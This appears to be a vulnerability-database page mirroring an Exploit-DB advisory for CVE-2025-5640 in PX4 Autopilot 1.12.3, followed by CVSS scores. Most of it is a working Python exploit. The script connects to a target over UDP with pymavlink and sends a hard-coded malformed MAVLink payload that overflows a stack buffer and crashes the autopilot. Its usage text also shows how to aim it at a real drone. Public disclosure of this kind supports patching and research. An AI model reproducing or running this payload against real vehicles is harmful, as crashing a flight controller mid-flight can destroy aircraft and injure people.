📄 PX4 Military UAV Autopilot 1.12.3 Denial of Service

🗓️ 26 Jun 2025 00:00:00Reported by Mohammed Idrees BanyamerType

packetstorm🔗 packetstorm.news👁 102 Views

Denial of Service in PX4 Autopilot <=1.12.3 via buffer overflow on a malformed MAVLink message.

Reporter	Title	Published	Views	Family All 13
Circl	CVE-2025-5640	5 Jun 202506:48	–	circl
CNNVD	PX4 Drone Autopilot 安全漏洞	5 Jun 202500:00	–	cnnvd
CVE	CVE-2025-5640	5 Jun 202506:00	–	cve
Cvelist	CVE-2025-5640 PX4-Autopilot TRAJECTORY_REPRESENTATION_WAYPOINTS Message mavlink_receiver.cpp stack-based overflow	5 Jun 202506:00	–	cvelist
Exploit DB	PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS)	26 Jun 202500:00	–	exploitdb
EUVD	EUVD-2025-16967	3 Oct 202520:07	–	euvd
GithubExploit	Exploit for CVE-2025-5640	21 Jun 202511:52	–	githubexploit
NVD	CVE-2025-5640	5 Jun 202506:15	–	nvd
Packet Storm	📄 PX4 Military UAV Autopilot 1.12.3 Denial of Service	2 Dec 202500:00	–	packetstorm
Packet Storm	📄 Keras 2.15 Insecure Deserialization	18 Dec 202500:00	–	packetstorm

# Exploit Title: PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS)
    # Author: Mohammed Idrees Banyamer (@banyamer_security)
    # GitHub: https://github.com/mbanyamer
    # Date: 2025-06-21
    # Tested on: Ubuntu 20.04 LTS + PX4 SITL (jMAVSim)
    # CVE: CVE-2025-5640
    # Type: Denial of Service (DoS) via Buffer Overflow
    # Platform: Cross-platform (Military UAVs / PX4 SITL / Linux-based autopilot ground station)
    # Author Country: Jordan
    # Description:
    #   A stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot <=1.12.3 is triggered
    #   when handling a malformed MAVLink message of type TRAJECTORY_REPRESENTATION_WAYPOINTS.
    #   An attacker with access to the MAVLink communication channel can send a crafted packet
    #   to crash the autopilot, potentially disrupting military UAV operations. This exploit demonstrates
    #   a proof-of-concept that causes the PX4 autopilot to crash via UDP.
    
    
    import argparse
    import binascii
    from pymavlink import mavutil
    import sys
    
    # Exploit payload (malformed MAVLink hex)
    hex_payload = (
        "fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352"
        "c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b78"
        "12731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6"
    )
    
    def connect_to_px4(ip, port, timeout, verbose=False):
        try:
            if verbose:
                print(f"[*] Connecting to PX4 at udp:{ip}:{port} ...")
            master = mavutil.mavlink_connection(f"udp:{ip}:{port}")
            master.wait_heartbeat(timeout=timeout)
            if verbose:
                print("[+] PX4 heartbeat received. Connection OK.")
            return master
        except Exception as e:
            print(f"[!] Error connecting to PX4: {e}")
            sys.exit(1)
    
    def send_dos_packet(master, verbose=False):
        try:
            payload = binascii.unhexlify(hex_payload)
            master.write(payload)
            print("[+] Exploit packet sent. Monitor PX4 for crash.")
        except Exception as e:
            print(f"[!] Failed to send payload: {e}")
            sys.exit(1)
    
    def main():
        usage = """
        PX4 Exploit Tool - CVE-2025-5640
        =================================
        Exploit a buffer overflow vulnerability in PX4 autopilot via MAVLink.
    
        USAGE:
            python3 px4_exploit_tool.py [OPTIONS]
    
        EXAMPLES:
            # Run DoS attack on default PX4 SITL
            python3 px4_exploit_tool.py --mode dos
    
            # Test connectivity to a real drone
            python3 px4_exploit_tool.py --mode check --ip 192.168.10.10 --port 14550
    
        OPTIONS:
            --ip        Target IP address (default: 127.0.0.1)
            --port      Target UDP port (default: 14540)
            --mode      Mode of operation: dos (default), check
            --timeout   Timeout in seconds for heartbeat (default: 5)
            --verbose   Enable verbose output
        """
        parser = argparse.ArgumentParser(
            description="PX4 MAVLink DoS Exploit Tool (CVE-2025-5640) by @banyamer_security",
            epilog=usage,
            formatter_class=argparse.RawDescriptionHelpFormatter
        )
        parser.add_argument("--ip", default="127.0.0.1", help="Target IP address (default: 127.0.0.1)")
        parser.add_argument("--port", type=int, default=14540, help="Target UDP port (default: 14540)")
        parser.add_argument("--timeout", type=int, default=5, help="Timeout in seconds for heartbeat (default: 5)")
        parser.add_argument("--mode", choices=["dos", "check"], default="dos", help="Mode: dos (default) or check connection")
        parser.add_argument("--verbose", action="store_true", help="Enable verbose output")
    
        args = parser.parse_args()
    
        master = connect_to_px4(args.ip, args.port, args.timeout, args.verbose)
    
        if args.mode == "check":
            print("[*] PX4 is alive. Connection test passed.")
        elif args.mode == "dos":
            send_dos_packet(master, args.verbose)
    
    
    if __name__ == "__main__":
        main()

26 Jun 2025 00:00Current

4.5Medium risk

Vulners AI Score4.5

CVSS 21.7

CVSS 3.13.3

CVSS 44.8

CVSS 33.3

EPSS0.00191

SSVC